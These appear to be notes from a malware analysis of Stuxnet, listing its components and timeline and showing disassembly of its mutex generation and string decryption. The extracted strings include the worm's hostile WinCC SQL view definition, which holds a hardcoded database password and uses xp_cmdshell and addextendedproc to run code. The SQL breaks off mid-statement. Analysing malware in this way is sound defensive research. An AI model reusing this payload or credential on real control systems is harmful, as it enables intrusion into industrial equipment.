Components Tree
.LNK files
~WTRxxxx.tmp dlls
Extracted/decompressed dll
MRXxxx.sys drivers
2 Embedded Wrapper.dll
Embedded .exe template
Embedded .lnk template
Embedded ~WTR4141.tmp
Embedded .cab file
Another .dll
Two .dat files
Components Breakdown
Copy of Shortcut
to.lnk
Copy of Copy of Shortcut
to.lnk
Copy of Copy of Copy of
Shortcut to.lnk
Copy of Copy of Copy of Copy of
Shortcut to.lnk
~WTR4141.tmp
~WTR4132.tmp
DLL ~1250 KB
This is the main Trojan
Many exported functions
Many embedded resources
Many capabilities
This is what we will focus on
Stuxnet timeline
1/1/2009 10:50:28AM Stuxnet Generic PE Template
Timestamp
1/1/2009 10:53:25AM MRxcls.sys Timestamp
~WRT4141.tmp
CreateMutex format {%08x-%08x-%08x-%08x}, derived from current process id
mutations
100020A7
call dword ptr [0x10005048] // __imp_KERNEL32.dll!
GetCurrentProcessId[0000588A]
100020AD loc_100020AD:
100020AD
mov ecx,eax
100020AF
xor ecx,0x00049481
100020B5
push ecx
100020B6
mov edx,eax
100020B8
xor edx,0x05858721
100020BE
push edx
100020BF
mov ecx,eax
100020C1
xor ecx,0x0AE48481
100020C7
push ecx
100020C8
xor eax,0x05858AA3
100020CD
push eax
100020CE
lea edx,[esp+0x14]
100020D2
push 0x100054F8 // {%08x-%08x-%08x-%08x}
100020D7
push edx
100020D8
call dword ptr [0x100050D8] // __imp_USER32.dll!
wsprintfW[00005AD2]
10002137
call dword ptr [0x10005048] // __imp_KERNEL32.dll!
GetCurrentProcessId[0000588A]
1000213D loc_1000213D:
1000213D
mov ecx,eax
1000213F
xor ecx,0x04393481
10002145
push ecx
10002146
mov edx,eax
10002148
xor edx,0x05800097
1000214E
push edx
1000214F
mov ecx,eax
10002151
xor ecx,0x00040941
10002157
push ecx
10002158
xor eax,0x09487481
1000215D
push eax
1000215E
lea edx,[esp+0x14]
10002162
push 0x100054F8 // {%08x-%08x-%08x-%08x}
10002167
push edx
10002168
call dword ptr [0x100050D8] // __imp_USER32.dll!
wsprintfW[00005AD2]
CreateMutex: {BE3533AB-2DDC-46a1-8F7B-F102B8A5C30A}
loc_100036F1:
push edi
loc_100036F2:
inc ecx
inc ecx
mov ax,word ptr [ecx]
inc edx
inc edx
mov edi,0xAE12
xor ax,di
mov word ptr [edx],ax
jne 0x100036F2 // loc_100036F2
loc_10003706:
pop edi
loc_10003707:
ret
~WTR4132.TMP
Large dll, custom loaded by first wtr tmp. Mostly contains a UPX packed dll. Utilizes
special loading methods very similar to first wtr tmp to custom extract and load the
dll in memory.
STUXNET.DLL
MCPTVARIABLEDESC.OSDATASIZE,
MCPTVARIABLEDESC.VARGROUPID,
MCPTVARIABLEDESC.VARXRES,
MCPTVARIABLEDESC.VARMARK,
MCPTVARIABLEDESC.SCALETYPE,
MCPTVARIABLEDESC.SCALEPARAM1,
MCPTVARIABLEDESC.SCALEPARAM2,
MCPTVARIABLEDESC.SCALEPARAM3,
MCPTVARIABLEDESC.SCALEPARAM4
from MCPTVARIABLEDESC
view MCPVREADVARPERCON as
select MCPTVARIABLEDESC.VARIABLEID,
MCPTVARIABLEDESC.VARIABLETYPEID, MCPTVARIABLEDESC.FORMATFITTING,
MCPTVARIABLEDESC.SCALEID,
MCPTVARIABLEDESC.VARIABLENAME,
MCPTVARIABLEDESC.ADDRESSPARAMETER, MCPTVARIABLEDESC.PROTOKOLL,
MCPTVARIABLEDESC.MAXLIMIT,
MCPTVARIABLEDESC.MINLIMIT,
MCPTVARIABLEDESC.STARTVALUE, MCPTVARIABLEDESC.SUBSTVALUE,
MCPTVARIABLEDESC.VARFLAGS,
MCPTVARIABLEDESC.CONNECTIONID,
MCPTVARIABLEDESC.VARPROPERTY, MCPTVARIABLEDESC.CYCLETIMEID,
MCPTVARIABLEDESC.LASTCHANGE, MCPTVARIABLEDESC.ASDATASIZE,
MCPTVARIABLEDESC.OSDATASIZE, MCPTVARIABLEDESC.VARGROUPID,
MCPTVARIABLEDESC.VARXRES, MCPTVARIABLEDESC.VARMARK,
MCPTVARIABLEDESC.SCALETYPE,
MCPTVARIABLEDESC.SCALEPARAM1,
MCPTVARIABLEDESC.SCALEPARAM2,
MCPTVARIABLEDESC.SCALEPARAM3,
MCPTVARIABLEDESC.SCALEPARAM4 from MCPTVARIABLEDESC
view MCPVREADVARPERCON as select
MCPTVARIABLEDESC.VARIABLEID,MCPTVARIABLEDESC.VARIABLETYPEID,MCPTVARIA
BLEDESC.FORMATFITTING,MCPTVARIABLEDESC.SCALEID,MCPTVARIABLEDESC.VARIA
BLENAME,MCPTVARIABLEDESC.ADDRESSPARAMETER,MCPTVARIABLEDESC.PROTOKO
LL,MCPTVARIABLEDESC.MAXLIMIT,MCPTVARIABLEDESC.MINLIMIT,MCPTVARIABLEDES
C.STARTVALUE,MCPTVARIABLEDESC.SUBSTVALUE,MCPTVARIABLEDESC.VARFLAGS,M
CPTVARIABLEDESC.CONNECTIONID,MCPTVARIABLEDESC.VARPROPERTY,MCPTVARIA
BLEDESC.CYCLETIMEID,MCPTVARIABLEDESC.LASTCHANGE,MCPTVARIABLEDESC.ASD
ATASIZE,MCPTVARIABLEDESC.OSDATASIZE,MCPTVARIABLEDESC.VARGROUPID,MCPT
VARIABLEDESC.VARXRES,MCPTVARIABLEDESC.VARMARK,MCPTVARIABLEDESC.SCAL
ETYPE,MCPTVARIABLEDESC.SCALEPARAM1,MCPTVARIABLEDESC.SCALEPARAM2,MCP
TVARIABLEDESC.SCALEPARAM3,MCPTVARIABLEDESC.SCALEPARAM4 from
MCPTVARIABLEDESC
view MCPVREADVARPERCON as select
VARIABLEID,VARIABLETYPEID,FORMATFITTING,SCALEID,VARIABLENAME,ADDRESSPA
RAMETER,PROTOKOLL,MAXLIMIT,MINLIMIT,STARTVALUE,SUBSTVALUE,VARFLAGS,CO
NNECTIONID,VARPROPERTY,CYCLETIMEID,LASTCHANGE,ASDATASIZE,OSDATASIZE,VA
RGROUPID,VARXRES,VARMARK,SCALETYPE,SCALEPARAM1,SCALEPARAM2,SCALEPAR
AM3,SCALEPARAM4 from
MCPTVARIABLEDESC,openrowset('SQLOLEDB','Server=.\WinCC;uid=WinCCConnect;
pwd=2WSXcder','select 0;declare @t varchar(999),@s varchar(999),@a int declare r
cursor for select filename from master..sysdatabases where (name like ''CC%'')
open r fetch next from r into @t while (@@fetch_status<>-1) begin set
@t=left(@t,len(@t)-charindex(''\'',reverse(@t)))+''\GraCS\cc_tlg7.sav'';exec
master..xp_fileexist @t,@a out;if @a=1 begin set @s = ''master..xp_cmdshell
''''extrac32 /y "''+@t+''" "''+@t+''x"'''''';exec(@s);set @t=@t+''x'';dbcc
addextendedproc(sp_run,@t);exec master..sp_run;exec